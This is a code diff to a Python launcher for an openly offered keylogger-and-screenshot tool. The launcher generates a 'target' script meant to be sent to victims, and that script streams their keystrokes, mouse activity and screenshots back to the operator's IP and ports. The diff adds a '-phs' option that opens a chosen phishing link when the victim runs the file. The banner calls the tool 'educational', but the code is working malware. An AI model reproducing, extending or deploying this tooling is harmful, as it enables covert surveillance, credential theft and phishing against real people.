@@ -1,21 +1,25 @@
+import os
 try:
     import pyautogui as pg
 
 except KeyError:
-    with open(r"KeyloggerScreenshot\__init__.py", "r+") as file:
+    os.chdir("KeyloggerScreenshot")
+
+    with open("__init__.py", "r+") as file:
         data = [line.replace("\n", "") for line in file]
 
-    with open(r"KeyloggerScreenshot\__init__.py", "w+") as file:
+    with open("__init__.py", "w+") as file:
         for each in data:
             if each not in ["import PIL.Image", "from pynput import keyboard", "from pynput.mouse import Listener",
                             "import tkinter as tk", "import pyautogui as pg"]:
                 file.write(f"{each}\n")
+    os.chdir("..")
 
 import KeyloggerScreenshot as ks
 import sys
 import threading
 import random
-import os
+import requests
 
 gui = """
     __ __              __                                 _____                                       __            __ 
@@ -24,7 +28,7 @@ gui = """
  / /| |/  __// /_/ // // /_/ // /_/ // /_/ //  __// /   ___/ // /__ / /   /  __//  __// / / /(__  )/ / / // /_/ // /_  
 /_/ |_|\___/ \__, //_/ \____/ \__, / \__, / \___//_/   /____/ \___//_/    \___/ \___//_/ /_//____//_/ /_/ \____/ \__/  
             /____/           /____/ /____/    
-                                                                                     
+
                         ~Created by: Fawaz Bashiru~             
                         ~Write "python KLS_start.py -help" for help    
                         REMINDER THIS WAS BUILD FOR EDUCATIONAL PURPOSES
@@ -33,12 +37,13 @@ gui = """
 lst = sys.argv
 
 try:
-    if "-aip" in lst: #"aip" stands for address ip
+    if "-aip" in lst:  # "aip" stands for address ip
         idx = lst.index("-aip")
         try:
             global simulation
             global boolean
-            ipaddress = str(lst[idx+1])
+            ipaddress = str(lst[idx + 1])
+
             zahlen = "123456789"
             nummer = 0
             port_numbers = []
@@ -100,21 +105,23 @@ threading_server4.start() '''
                     print('"demon_server.py" HAS BEEN CREATED')
                 except IndexError:
                     quit()
-            if "-p" in lst: #"p" stands for ports
+            if "-p" in lst:  # "p" stands for ports
                 idx_port = lst.index("-p")
                 try:
                     print('ALL THE NUMBERS HAVE BEEN SAVED TO "ports.py"')
-                    print(f"\nport_photos = {port_photos}\nport_keylogger = {port_keylogger}\nport_listener = {port_listener}\nport_time = {port_time}\n")
+                    print(
+                        f"\nport_photos = {port_photos}\nport_keylogger = {port_keylogger}\nport_listener = {port_listener}\nport_time = {port_time}\n")
                     with open("ports.py", "a+") as file:
-                        file.write(f"port_photos = {port_photos}\nport_keylogger = {port_keylogger}\nport_listener = {port_listener}\nport_time = {port_time}")
+                        file.write(
+                            f"port_photos = {port_photos}\nport_keylogger = {port_keylogger}\nport_listener = {port_listener}\nport_time = {port_time}")
 
                 except IndexError:
                     quit()
 
-            if "-s" in lst: #"s" stands for seconds
+            if "-s" in lst:  # "s" stands for seconds
                 idx_s = lst.index("-s")
                 try:
-                    if "-" in lst[idx_s+1]:
+                    if "-" in lst[idx_s + 1]:
                         print(gui)
                         print("PLEASE SPECIFY YOUR SECONDS -s")
                         quit()
@@ -127,11 +134,45 @@ threading_server4.start() '''
 
                 except IndexError:
                     seconds = 60
-            else: seconds = 60
+            else:
+                seconds = 60
 
-            if "-cf" in lst: #"cf" stands for Create file
-                idx_cf = lst.index("-cf")
+            if "-phs" in lst:
+                global phishing_name
+                phishing_name = None
                 try:
+                    phs_idx = lst.index("-phs")
+                    phishing_name = lst[phs_idx + 1]
+                    if "-cf" not in lst:
+                        print(gui)
+                        print(
+                            'YOU HAVE NOT SPECIFIED THE FILE. IF YOU NEED HELP SIMPLY TYPE "python KLS_start.py -help" IN YOUR TERMINAL')
+                        sys.exit()
+                    try:
+                        req = requests.get(phishing_name)
+
+                    except requests.exceptions.RequestException:
+                        print(gui)
+                        print(f'WEBSITE: {phishing_name} IS NOT AVAILABLE')
+                        sys.exit()
+
+                except IndexError:
+                    print(gui)
+                    print("NO LINK HAS BEEN TYPED")
+                    sys.exit()
+
+            else:
+                phishing_name = None
+
+            if "-cf" in lst:  # "cf" stands for Create file
+                idx_cf = lst.index("-cf")
+                if phishing_name is not None:
+                    phishing_value = f'"{phishing_name}"'
+                else:
+                    phishing_value = None
+
+                try:
+
                     filename = lst[idx_cf + 1]
                     if not filename.endswith("py"):
                         data = filename.split(".")
@@ -142,13 +183,18 @@ threading_server4.start() '''
                     if os.path.exists(filename):
                         os.remove(filename)
 
+                    if phishing_name is not None: print(
+                        f'LINK: {phishing_name} WILL BE OPEND WHEN {filename} IS EXECUTED')
+
                     with open(f"{filename}", "a+") as file:
-                        file.write(f"import KeyloggerScreenshot as ks \n\nip = '{ipaddress}'\nkey_client = ks.KeyloggerTarget(ip, {port_photos}, ip, {port_keylogger}, ip, {port_listener}, ip, {port_time}, duration_in_seconds={seconds}) \nkey_client.start()")
+                        file.write(
+                            f"import KeyloggerScreenshot as ks \n\nip = '{ipaddress}'\nkey_client = ks.KeyloggerTarget(ip, {port_photos}, ip, {port_keylogger}, ip, {port_listener}, ip, {port_time}, duration_in_seconds={seconds}, phishing_web={phishing_value}) \nkey_client.start()")
                     print(f"{filename.upper()} has been created")
 
                 except IndexError:
                     with open("target.py", "a+") as file:
-                        file.write(f"import KeyloggerScreenshot as ks \n\nip = '{ipaddress}'\nkey_client = ks.KeyloggerTarget(ip, {port_photos}, ip, {port_keylogger}, ip, {port_listener}, ip, {port_time}, duration_in_seconds={seconds}) \nkey_client.start()")
+                        file.write(
+                            f"import KeyloggerScreenshot as ks \n\nip = '{ipaddress}'\nkey_client = ks.KeyloggerTarget(ip, {port_photos}, ip, {port_keylogger}, ip, {port_listener}, ip, {port_time}, duration_in_seconds={seconds}, phishing_web={phishing_value}) \nkey_client.start()")
                     print("TARGET.PY HAS BEEN CREATED YOU CAN SEND THIS TO YOUR TARGET")
 
             server_photos = ks.ServerPhotos(ipaddress, port_photos)
@@ -182,7 +228,8 @@ threading_server4.start() '''
 
     if "-help" in lst:
         print(gui)
-        print("\n-aip INSERT THE SERVERS IP\n-s   SPECIFY YOUR SECONDS (DEFAULT 60 SECONDS)\n-cf  CREATES TARGET FILE WHICH YOU SEND TO ANY TARGET\n-p   SAVES ALL THE PORTS OF THE CURRENT SERVER\n-ds  CREATES A SERVER WITH THE SAME PORTS AS THE TARGET\n-sim ACTIVATES SIMULATION")
+        print(
+            "\n-aip INSERT THE SERVERS IP\n-s   SPECIFY YOUR SECONDS (DEFAULT 60 SECONDS)\n-cf  CREATES TARGET FILE WHICH YOU SEND TO ANY TARGET\n-p   SAVES ALL THE PORTS OF THE CURRENT SERVER\n-ds  CREATES A SERVER WITH THE SAME PORTS AS THE TARGET\n-sim ACTIVATES SIMULATION\n-phs OPENS A LINK WHEN THE KEYLOGGER IS EXECUTED")
 
 except OSError:
     print('CHECK YOUR IP-ADDRESS WITH "ipconfig" ON WINDOWS AND "ifconfig" ON LINUX')
